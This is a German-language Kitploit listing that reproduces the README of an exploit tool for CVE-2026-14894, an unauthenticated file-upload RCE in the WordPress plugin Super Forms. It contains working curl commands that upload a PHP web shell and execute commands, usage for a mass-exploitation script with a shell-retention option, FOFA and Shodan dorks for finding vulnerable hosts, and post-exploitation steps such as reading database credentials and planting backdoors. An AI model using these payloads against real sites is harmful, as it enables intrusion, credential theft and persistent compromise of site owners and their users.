Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-14894 — Super Forms Nicht authentifizierter Datei-Upload RCE | CVSS 9.8 | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-14894
AufklärungPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstestsLernen & Bildung
GitHubshinthink/cve-2026-14894

CVE-2026-14894

Super Forms Nicht authentifizierter Datei-Upload RCE | CVSS 9.8

118vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

CVE-2026-14894 — Super Forms Unauthenticated File Upload RCE

Nonce-Leck → datauristring-Upload → Code-Ausführung


Übersicht

CVE-2026-14894 ist eine kritische (CVSS 9.8) unauthentifizierte Schwachstelle für willkürlichen Datei-Upload im WordPress-Plugin Super Forms – Drag & Drop Form Builder (von WebRehab) in den Versionen ≤ 6.3.313.

Der super_submit_form nopriv AJAX-Handler akzeptiert Datei-Uploads über Formulareingaben, ohne:

  1. Die Authentifizierung des Benutzers zu überprüfen
  2. Den Dateityp oder die Erweiterung zu validieren
  3. Den MIME-Inhalt anhand von Magic-Bytes zu prüfen

Die Nonce-Schranke wird trivial umgangen – ein separater nopriv AJAX-Handler (super_create_nonce) generiert gültige Nonces für jeden nicht authentifizierten Besucher.

Angreifer laden willkürliche PHP-Dateien über Base64-kodierte datauristring-Payloads hoch, die direkt nach /wp-content/uploads/superforms/ mit dem vom Angreifer kontrollierten Dateinamen geschrieben werden – dies führt zur direkten Code-Ausführung.

Betroffene Versionen

VersionStatus
≤ 6.3.313Angreifbar
6.3.314+Gepatcht

Aktive Installationen: 600.000+
Entdeckt von: andrea bocchetti via Wordfence (7. Juli 2026)


Schwachstellenmechanismus

Ursache

Drei fehlende Sicherheitsprüfungen im AJAX-Datei-Upload-Handler von Super Forms:

// Angreifbar: nopriv AJAX – keine Authentifizierung, keine Dateitypvalidierung, keine MIME-Prüfung
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce');  // Nonce für jeden
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form');   // Upload für jeden

function super_submit_form() {
    $data = json_decode(stripslashes($_POST['data']), true);
    $file = $data['sf_upload_field']['files'][0];
    $content = base64_decode($file['datauristring']);  // keine MIME-Validierung
    $name = $file['value'];                             // keine Dateinamen-Bereinigung
    fwrite(fopen($upload_path . $name, 'w'), $content); // PHP wird auf die Festplatte geschrieben
}

Nonce-Umgehung

// Jeder kann eine gültige Nonce erhalten – keine Authentifizierung erforderlich
function super_create_nonce() {
    $nonce = md5(uniqid(rand(), true));
    $_SESSION['sf_nonce'] = $nonce;
    echo $nonce;  // wird an den nicht authentifizierten Angreifer zurückgegeben
}

Angriffsablauf

1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
   → Gültige Nonce erhalten (keine Authentifizierung nötig)

2. POST /wp-admin/admin-ajax.php?action=super_submit_form
   sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
     "datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
     "value":"shell.php"}]}}
   → Shell wird nach /wp-content/uploads/superforms/ geschrieben

3. GET /wp-content/uploads/superforms/shell.php?c=id
   → RCE bestätigt

Installation

git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt

Nutzung

# Einzelnes Ziel
python cve_2026_14894.py -t target.com

# Massen-Exploit
python cve_2026_14894.py -f targets.txt

# Massen-Exploit + Ergebnisse speichern
python cve_2026_14894.py -f targets.txt -o shells.txt

# Shells auf dem Ziel belassen
python cve_2026_14894.py -t target.com --no-cleanup

# Debug-Modus (jede Anfrage anzeigen)
python cve_2026_14894.py -t target.com --debug

Argumente

  -t, --target      Einzelnes Ziel (Domain oder IP)
  -f, --file        Zielliste, eine pro Zeile
  -o, --output      RCE-Ergebnisse in Datei speichern
  --threads         Gleichzeitige Worker (Standard: 30)
  --no-cleanup      Shells auf dem Ziel belassen
  --debug           Jede HTTP-Anfrage + Phase in Echtzeit anzeigen
  -v, --verbose     Ausführliche Ausgabe anzeigen

Proof of Concept

Einzelnes Ziel

$ python cve_2026_14894.py -t target.com --debug
  Super Forms | CVE-2026-14894 | CVSS 9.8

  [target.com] [+] Super Forms detected v6.3.312
  [target.com] [*] Nonce obtained
  [target.com] [*] Uploading shell...
  [target.com] [!] RCE confirmed

  Host       : target.com
  SuperForms : YES v6.3.312
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 2.1s

Massenscan

  Targets: 2500  |  Threads: 30

  [RCE]    target-vuln-01.com                                 2.1s  v6.3.312
  [UP]     target-patched-02.com                              1.8s  v6.3.314 (upload blocked)
  [!]      target-no-plugin-03.com                            0.5s  not installed
  [150/2500] 6%  |  SuperForms:47  Upload:18  RCE:12

  ───────────────────────────────────────────────────────
  Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12

Manueller Exploit

Schritt 1 – Nonce abrufen

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_create_nonce'
# Gibt eine Nonce mit 96 Hex-Zeichen zurück

Schritt 2 – PHP-Shell hochladen

NONCE="abc123..."
SHELL_B64=$(echo '<?php system($_GET["c"]); ?>' | base64 -w0)

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_submit_form' \
  -d "sf_nonce=$NONCE" \
  -d 'form_id=1' \
  -d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'

Schritt 3 – Befehle ausführen

curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'

FOFA-Dork

body="wp-content/plugins/super-forms"

Shodan

http.html:"super-forms"

Auswirkungen

Ein erfolgreicher Exploit führt zur Remote-Code-Ausführung als Webserver-Benutzer. Davon ausgehend:

  • wp-config.php auslesen → Datenbank-Anmeldedaten
  • Zugriff auf alle WordPress-Inhalte, Benutzer und Plugin-Daten
  • Permanente Backdoors einspielen
  • Zu internen Netzwerken wechseln

Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS.

Diese Software ist vorgesehen für Sicherheitsexperten, die autorisierte Penetrationstests durchführen, Organisationen, die ihre eigene Infrastruktur prüfen, und Forscher, die Schwachstellen-Exploits untersuchen.

Unbefugter Zugriff auf Computersysteme ist illegal und kann Folgendes verletzen:

  • Vereinigte Staaten: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesien: UU ITE Pasal 30 & 46
  • Europäische Union: Richtlinie 2013/40/EU
  • Vereinigtes Königreich: Computer Misuse Act 1990

Die Autoren übernehmen keine Haftung für Missbrauch.


Referenzen

RessourceLink
Wordfence Advisorywordfence.com
IONIX Advisoryionix.io
NVD EntryCVE-2026-14894
Researcherandrea bocchetti

Dieses Projekt steht in keiner Verbindung zu WebRehab oder Super Forms.

Tool herunterladen